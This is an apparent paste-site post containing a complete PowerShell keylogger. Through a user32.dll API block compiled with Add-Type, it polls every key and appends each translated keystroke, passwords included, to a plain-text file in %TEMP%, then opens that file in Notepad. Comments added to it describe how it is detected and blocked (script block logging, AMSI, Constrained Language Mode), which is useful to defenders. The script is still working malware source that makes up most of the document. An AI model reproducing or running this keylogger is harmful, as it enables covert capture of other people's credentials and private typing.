Alexislls

Keylogger con PowerShell

Dec 21st, 2016
#requires -Version 2

# Start-KeyLogger: interactive console demo that polls the Win32 keyboard API
# and appends every translated key press to a plain-text file.
#
# Parameters:
#   $Path - output file; defaults to keylogger.txt in the current user's
#           %TEMP% directory.
#
# Behaviour visible in this listing:
#   * New-Item -Force creates the output file, replacing any existing file
#     at that path.
#   * Captured characters are appended unencrypted (UTF-16), so anything
#     typed while the loop runs, credentials included, ends up readable on disk.
#   * Nothing in the function deletes the file; it stays behind after exit.
#
# Review notes for detection and hardening:
#   * The script text carries the literal names GetAsyncKeyState,
#     GetKeyboardState, MapVirtualKey and ToUnicode inside a user32.dll
#     DllImport block handed to Add-Type. PowerShell script block logging
#     (event ID 4104) and AMSI-integrated scanners see that text.
#   * Add-Type compiles C# at run time; on Windows PowerShell this typically
#     shows up as csc.exe started by the PowerShell host plus temporary
#     compiler files.
#   * Add-Type of arbitrary source is blocked under Constrained Language Mode,
#     so the API type below cannot be created there.
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
  # P/Invoke signatures for the four user32.dll functions used below
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # compile the signatures into the type API.Win32; -PassThru returns the
  # type so its static members can be called through $API
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru

  # create (or truncate, because of -Force) the output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {
    # visible console banner: the function announces itself and then blocks
    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red

    # endless loop. When the user presses CTRL+C, the finally-block
    # executes and shows the collected key presses
    while ($true) {
      # poll interval: one pass over the key codes every 40 ms
      Start-Sleep -Milliseconds 40

      # walk codes 9..254. They are passed to GetAsyncKeyState as its
      # virtualKeyCode argument, so they are virtual-key codes, not ASCII
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # -32767 is 0x8001 as a signed 16-bit value: high bit (key is down)
        # and low bit (pressed since the previous call) are both set
        if ($state -eq -32767) {
          # property read whose value is discarded; kept exactly as written
          $null = [console]::CapsLock

          # MapVirtualKey with map type 3; the result is passed to ToUnicode
          # below as its wScanCode argument
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys (256-byte table);
          # the return value is stored but never read in this listing
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate the key into text using the captured keyboard state
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          # any non-zero return value is treated as success
          if ($success)
          {
            # append the character to the log file, UTF-16 encoded and
            # unencrypted; one file append per key press
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
          }
        }
      }
    }
  }
  finally
  {
    # runs when the loop is interrupted: open the log file in Notepad.
    # The file itself is left on disk.
    notepad $Path
  }
}

# records all key presses until script is aborted by pressing CTRL+C
# will then open the file with collected key codes
# (called without arguments, so the default %TEMP%\keylogger.txt path is used)
Start-KeyLogger